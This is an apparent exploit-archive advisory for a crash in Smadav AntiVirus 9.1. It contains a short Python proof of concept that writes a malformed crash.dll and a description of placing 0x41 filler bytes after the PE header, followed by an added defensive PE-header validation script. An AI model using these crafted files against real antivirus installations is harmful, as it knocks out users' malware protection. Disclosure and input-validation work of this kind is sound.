
# Title : Smadav Anti Virus 9.1 Crash PoC
# Published : 2012-11-12
# Author :


# Exploit Title: Smadav AntiVirus - Crash PoC
# Date: 10/Nov/2012
# Exploit Author: Mada R Perdhana (mada@spentera.com) / Spentera Research Team
# Vendor Homepage: http://www.smadav.net & http://www.smadav.web.id
# Software Link: http://www.smadav.net/download
# Version: 9.1 (latest version; previous versions should also be affected)
# Tested on: Windows XP SP 2


The product crashes when scanning a malicious .dll generated using
this script:

----python--
file = open("crash.dll","wb")
file.write("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")
file.close()
-------

The trick is to add 49 malicious bytes (represented here by \x41)
to the .dll file, right after the PE (\x50\x45) header, at the 244th byte
of the file.
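
The bounds checks a scanner needs before it trusts PE header fields, which is the class of input handling this crash points at, shown as an added example that is not part of the original advisory and not Smadav's code. The function names, the short machine list and the constructed stubs (with an assumed e_lfanew of 0xF0) are illustrative assumptions.

```python
import struct

KNOWN_MACHINES = {0x014C, 0x8664, 0x0200}   # i386, AMD64, IA-64 (short subset, assumption)
OPT_MAGICS = {0x010B, 0x020B}               # PE32, PE32+
SECTION_HDR = 40                            # size of one section table entry

def check_pe_headers(data):
    """Return a list of findings; an empty list means the headers are sane."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return ["not an MZ image"]
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # PE signature (4 bytes) + COFF file header (20 bytes) must fit in the file.
    if e_lfanew + 24 > len(data):
        return ["e_lfanew points outside the file"]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return ["bad PE signature"]
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    findings = []
    if machine not in KNOWN_MACHINES:
        findings.append("unknown machine 0x%04x" % machine)
    opt_off = e_lfanew + 24
    sec_off = opt_off + opt_size
    if opt_size < 2 or sec_off > len(data):
        findings.append("optional header outside the file")
    elif struct.unpack_from("<H", data, opt_off)[0] not in OPT_MAGICS:
        findings.append("bad optional header magic")
    # Never index the section table before proving it lies inside the buffer.
    if sec_off + nsec * SECTION_HDR > len(data):
        findings.append("section table outside the file")
    return findings

def constructed_stub(after_signature):
    """Constructed sample: MZ stub, e_lfanew = 0xF0, then the given bytes."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0xF0)
    return dos.ljust(0xF0, b"\0") + b"PE\0\0" + after_signature

# Well-formed headers: i386, one section, 224-byte PE32 optional header.
GOOD = constructed_stub(
    struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x2102)
    + struct.pack("<H", 0x010B).ljust(224, b"\0") + b"\0" * SECTION_HDR)
# 0x41 filler where the COFF header belongs, as in the description above.
BAD = constructed_stub(b"\x41" * 49)

if __name__ == "__main__":
    print(check_pe_headers(GOOD), check_pe_headers(BAD))
```

A scanner that runs checks like these first can reject or flag the file as malformed instead of following attacker-controlled sizes and counts into unmapped memory.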